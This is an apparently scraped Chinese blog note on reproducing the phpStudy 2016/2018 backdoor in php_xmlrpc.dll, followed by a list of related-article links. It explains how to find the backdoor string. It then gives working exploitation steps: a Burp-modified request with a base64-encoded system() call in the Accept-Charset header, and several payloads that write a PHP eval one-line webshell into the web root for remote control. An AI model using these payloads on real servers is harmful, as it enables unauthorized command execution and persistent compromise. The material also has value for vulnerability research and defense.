笔记

前言

如果服务器是用phpstudy2016或phpstudy2018搭建的,那么就有可能存在后门

发现漏洞

后门代码在phpStudy2016和phpStudy2018的php-5.2.17或php-5.4.45的\ext\php_xmlrpc.dll文件中
只要该文件中可以搜索到@eval(%s(‘%s’)),即证明漏洞存在
phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

后门利用

(1)访问目标服务器url时,用bp抓包
(2)找到accept-encoding: gzip, deflate,把逗号后面的空格删掉,改为accept-encoding: gzip,deflate,然后在accept-encoding: gzip,deflate这行前面或后面加上一行accept-charset:c3lzdGVtKCdkaXInKTs=,然后发送(这里的c3lzdGVtKCdkaXInKTs=是经过base64加密的)

这里以windows举例:
此时可以向目标服务器写入一句话
(1)dir:查看当前目录下的内容,可以一层层查看,最后找到WWW目录所在,将一句话写入
(2)chdir:查看当前所在目录,类似于linux中的pwd
(3)利用bp向目标系统指定位置写一句话木马,^表示写入特殊字符,例如<或>。写入后xx.php内容为:<?php @eval($_REQUEST[peak);?>
payload:

echo ^<?php @eval($_REQUEST[cmd]);?^> > xx.php

(4)利用bp向目标系统指定位置写一句话木马,这个不同的是,没有用到^,写入后xx.php内容为"<?php @eval($_REQUEST[cmd]);?>",但有"也可使用蚁剑连接
payload:

echo "<?php @eval($_REQUEST[cmd]);?>" > xx.php
注: echo '<?php @eval($_REQUEST[cmd]);?>' > xx.php,也可,写入后为<?php @eval($_REQUEST[cmd]);?>

(5)假设目标服务器使用的是phpstudy2018,最后那么payload就是

system('echo ^<?php @eval($_REQUEST[cmd]);?^> > C:\phpStudy\PHPTutorial\WWW\xx.php');
或
system('echo "<?php @eval($_REQUEST[cmd]);?>" > C:\phpStudy\PHPTutorial\WWW\xx.php');

注:下面写法会报错,主要由于""中的变量会执行,上面可以是因为system里的整体是’’,表示该整体是字符串
所以system执行时,最好使用’’,包含php的代码的也最好是’'包括

system("echo '<?php @eval($_REQUEST[cmd]);?>' > C:\phpStudy\PHPTutorial\WWW\xx.php");

而如果使用

system("echo \"<?php @eval($_REQUEST[cmd]);?>\" > C:\phpStudy\PHPTutorial\WWW\xx.php");

最后xx.php中为"<?php @eval();?>",也是""引起的问题

phpstudy后门漏洞复现相关推荐

  1. 网站被攻击怎么处理 phpstudy存在后门漏洞

    phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安 ...

  2. 【漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞

    文章目录 前言 一.漏洞描述 二.漏洞复现 前言 本篇文章仅用于漏洞复现研究和学习,切勿从事非法攻击行为,切记! 一.漏洞描述 Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上 ...

  3. 《老漏洞复现与分析篇》 - 其一 - shift后门

    引言 因为本菜鸡的博客没什么文章素材,所以想开一个新文章类别,本来想整一个漏洞分析和复现的,无奈由于实力不允许,只能再前面加一个"老"字,整一点多年前的老漏洞拿来复现和分析.俗话说 ...

  4. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  5. Winrar目录穿越漏洞复现

    Winrar目录穿越漏洞复现 1.漏洞概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面.2019年 2 月 20 日Check Point团队爆出了 ...

  6. python phpstudy_GitHub - Writeup007/phpStudyBackDoor: phpStudy后门检测与利用工具,Python脚本,可一键 GetShell。...

    phpStudyBackDoor phpStudy后门检测与利用工具,Python脚本,可一键 GetShell. 简述 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发 ...

  7. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

  8. metinfov5.0.4漏洞复现

    metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简 ...

  9. php打开网页执行即执行bat程序_CVE202011107:XAMPP任意命令执行漏洞复现

    0x00简介 XAMPP是一个把Apache网页服务器与PHP.Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器.该软件与phpstudy类似. 2020年4 ...

最新文章

  1. python基础教程视频(全13集)-Python基础视频教程全集
  2. CENTOS6.6下zabbix2.4.7搭建
  3. cross-domain policy file
  4. gateway请求拦截_spring cloud gateway 拦截request Body
  5. Altium AD20原理图元件自动编号,位号重新排序
  6. ant java任务_Ant War任务
  7. Excel-图表与文本框/图片的组合
  8. 有限元方法数学理论之分片一次多项式空间逼近理论
  9. JAVA-微信网页授权
  10. electron-vue 打包桌面应用程序并封装
  11. 用python画写轮眼_创意scratch编程课:火影经典忍术,宇智波佐助的写轮眼!
  12. 从“棱镜门”事件看数据安全如何保护
  13. 初探Kronecker product(克罗内克积)
  14. ninja 编译threadx(ubuntu)
  15. java excel 边框颜色_poi生成excel整理(设置边框/字体/颜色/加粗/居中/)
  16. mysql两个日期相减,得到相差的天数
  17. 我的团队人物介绍卡片布局
  18. C#调用DLL的几种方法
  19. oracle11g-R2数据库的逻辑备份(数据泵的导入导出)
  20. 鸿蒙系统魅族,魅族宣布接入鸿蒙系统

热门文章

  1. notepad去除每行空格后面的所有的内容,并且获取每行最后一个字段的内容(就是删除每行的行首空格)...
  2. 万字长文深度解析python 单元测试
  3. 《数据库SQL实战》查找薪水涨幅超过15次的员工号emp_no以及其对应的涨幅次数t
  4. REST、SOAP、protocolbuf、thrift、avro
  5. pandas使用笔记大全
  6. value toDF is not a member of org.apache.spark.rdd.RDD[People]
  7. HBase、Redis、MongoDB、Couchbase、LevelDB主流 NoSQL 数据库的对比
  8. 推荐系统中使用ctr排序的f(x)的设计-传统模型篇
  9. 【机器学习】今天想跟大家聊聊SVM
  10. Elasticsearch6.X 新类型Join深入详解